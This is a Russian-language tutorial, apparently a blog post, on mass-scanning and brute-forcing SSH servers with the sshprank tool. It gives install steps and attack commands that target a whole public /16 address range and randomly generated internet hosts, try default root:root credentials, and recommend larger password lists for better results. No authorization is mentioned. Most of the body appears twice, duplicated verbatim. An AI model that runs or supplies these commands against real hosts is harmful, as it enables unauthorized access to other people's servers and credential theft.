Как взломать SSH серверы
Этичный Хакер
sshprank – быстрый массовый сканер SSH, взломщик логинов и инструмент для захвата баннеров, использующий модули python-masscan и shodan.
В данной статье мы разберемся, как просканировать получить доступ к большому количеству SSH-серверов с помощью программы Sshprank. Программа производит поиск компьютеров с работающим SSH-соединением и пытается получить доступ, используя метод перебора.
Установка:
sshprank – быстрый массовый сканер SSH, взломщик логинов и инструмент для захвата баннеров, использующий модули python-masscan и shodan.
В данной статье мы разберемся, как просканировать получить доступ к большому количеству SSH-серверов с помощью программы Sshprank. Программа производит поиск компьютеров с работающим SSH-соединением и пытается получить доступ, используя метод перебора.
Установка:
apt-get update && apt-get upgrade
sudo apt-get install git python3-pip
git clone https://github.com/noptrix/sshprank
cd sshprank
sudo pip3 install -r docs/requirements.txt
echo -e 109.22.{0..255}.{0..255}”\n” | sed ‘s/ //’ > council.txt
В фигурных скобках обозначен диапазон значений, которые будут сохранены текстовый файл под названием council.txt.
Запуск:
sshprank -l council.txt -U lists/user.txt -P lists/pws.txt -v
Данная команда запустит процесс перебора для подключения по SSH-соединению к хостам (council.txt), используя базу логинов (lists/user.txt) и паролей (lists/pws.txt). Вместо стандартных словарей рекомендуется использовать более мощные, поскольку это увеличит эффективность
Примеры запуска sshprank
Взламывать цели из данного списка (-l sshds.txt) с именем пользователя admin (-u admin), списком паролей в файле (-P /tmp/passlist.txt) в 20 потоков работы с хостами:
./sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20
Быстрое сканирование, затем взлом найденных служб ssh. Данные для сканирования передаются в masscan (-m ‘-p22,2022 –rate=5000 –source-ip 192.168.13.37 –range 192.168.13.1/24’):
sudo ./sshprank -m '-p22,2022 – rate=5000 – source-ip 192.168.13.37 – range 192.168.13.1/24'
Сгенерировать тысячу случайных IPv4 адресов, затем просканировать порты со скоростью 1k p/s и найденные sshd сервера попытаться взломать учётными данными ‘root:root’:
sudo ./sshprank -m '-p22 – rate=1000' -r 1000 -v
Собрать баннеры (-b hosts.txt) и вывести их в файл в формате, поддерживаемым опцией ‘-l‘:
./sshprank -b hosts.txt > sshds2.txt
apt-get update && apt-get upgrade
sudo apt-get install git python3-pip
git clone https://github.com/noptrix/sshprank
cd sshprank
sudo pip3 install -r docs/requirements.txt
echo -e 109.22.{0..255}.{0..255}”\n” | sed ‘s/ //’ > council.txt
В фигурных скобках обозначен диапазон значений, которые будут сохранены текстовый файл под названием council.txt.
Запуск:
sshprank -l council.txt -U lists/user.txt -P lists/pws.txt -v
Данная команда запустит процесс перебора для подключения по SSH-соединению к хостам (council.txt), используя базу логинов (lists/user.txt) и паролей (lists/pws.txt). Вместо стандартных словарей рекомендуется использовать более мощные, поскольку это увеличит эффективность
Примеры запуска sshprank
Взламывать цели из данного списка (-l sshds.txt) с именем пользователя admin (-u admin), списком паролей в файле (-P /tmp/passlist.txt) в 20 потоков работы с хостами:
./sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20
Быстрое сканирование, затем взлом найденных служб ssh. Данные для сканирования передаются в masscan (-m ‘-p22,2022 –rate=5000 –source-ip 192.168.13.37 –range 192.168.13.1/24’):
sudo ./sshprank -m '-p22,2022 – rate=5000 – source-ip 192.168.13.37 – range 192.168.13.1/24'
Сгенерировать тысячу случайных IPv4 адресов, затем просканировать порты со скоростью 1k p/s и найденные sshd сервера попытаться взломать учётными данными ‘root:root’:
sudo ./sshprank -m '-p22 – rate=1000' -r 1000 -v
Собрать баннеры (-b hosts.txt) и вывести их в файл в формате, поддерживаемым опцией ‘-l‘:
./sshprank -b hosts.txt > sshds2.txt

Домашняя страница: https://nullsecurity.net/tools/cracker.html